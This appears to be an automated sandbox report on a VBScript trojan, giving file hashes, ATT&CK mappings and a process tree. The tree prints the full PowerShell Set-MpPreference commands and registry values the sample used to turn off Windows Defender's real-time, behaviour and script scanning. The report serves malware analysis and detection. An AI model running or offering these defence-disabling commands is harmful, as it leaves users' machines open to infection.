f911a357abf083c321d7240e1070b470c9d2a64c1503700dbec45980c88c0aa4

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
31-05-2024 12:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

script.vbs
Size

1KB
MD5

77a4da4863ffcaba51ce05d3c632158d
SHA1

253f9a594a6ca3a7a23acb90f8dc81939215ba4b
SHA256

ecd586281fc4655e40108fcf118beeae3411c1c1176951a763e47fb66d2e421f
SHA512

ba215fa65a011f5841f5e92b4053895c13368e894817551a982ca3e821726b8bbb13616bca8781fed08f4c83528d0d3ac233fa1f3e14ad4253fdefd9a22253cf

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

WScript.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2756	powershell.exe
2796	powershell.exe
2860	powershell.exe
3004	powershell.exe
1284	powershell.exe
1944	powershell.exe
2712	powershell.exe
1516	powershell.exe
1280	powershell.exe
3032	powershell.exe
2548	powershell.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2756	powershell.exe
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeDebugPrivilege	2860	powershell.exe
Token: SeDebugPrivilege	3004	powershell.exe
Token: SeDebugPrivilege	1284	powershell.exe
Token: SeDebugPrivilege	1944	powershell.exe
Token: SeDebugPrivilege	2712	powershell.exe
Token: SeDebugPrivilege	1516	powershell.exe
Token: SeDebugPrivilege	1280	powershell.exe
Token: SeDebugPrivilege	3032	powershell.exe
Token: SeDebugPrivilege	2548	powershell.exe

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

WScript.exeWScript.exe

description	pid	process	target process
PID 2428 wrote to memory of 1400	2428	WScript.exe	WScript.exe
PID 2428 wrote to memory of 1400	2428	WScript.exe	WScript.exe
PID 2428 wrote to memory of 1400	2428	WScript.exe	WScript.exe
PID 1400 wrote to memory of 3004	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 3004	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 3004	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 1516	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 1516	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 1516	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 1944	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 1944	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 1944	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 2860	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 2860	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 2860	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 2796	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 2796	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 2796	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 1284	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 1284	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 1284	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 2712	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 2712	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 2712	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 2756	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 2756	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 2756	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 1280	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 1280	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 1280	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 2548	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 2548	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 2548	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 3032	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 3032	1400	WScript.exe	powershell.exe
PID 1400 wrote to memory of 3032	1400	WScript.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\script.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2428

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\script.vbs" /elevate
2⤵
- Modifies Windows Defender Real-time Protection settings
- Suspicious use of WriteProcessMemory
PID:1400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3004

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1516

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2860

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1284

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2756

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1280

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2548

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3032

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
50c72bc32ec09059ec3ebd5a0950f7aa

SHA1
1ed800b5a5ba9ddc35b1c28ba5aaa00001dec5f7

SHA256
929fddcb2b6330bd0603d085366be3bb203e37e3d86c625b981d3689fad3ad25

SHA512
330734f77ccd03936f7f95eeaa580df2f8064fc3aaf4f73f1c7cec699a8565cd588934bdd7d96c04a4f97ea2859a4837258e24625e3b6e66c37ea807178a4688

Download Submit
memory/2796-30-0x0000000001F70000-0x0000000001F78000-memory.dmp

Filesize
32KB

Download
memory/3004-5-0x000000001B740000-0x000000001BA22000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads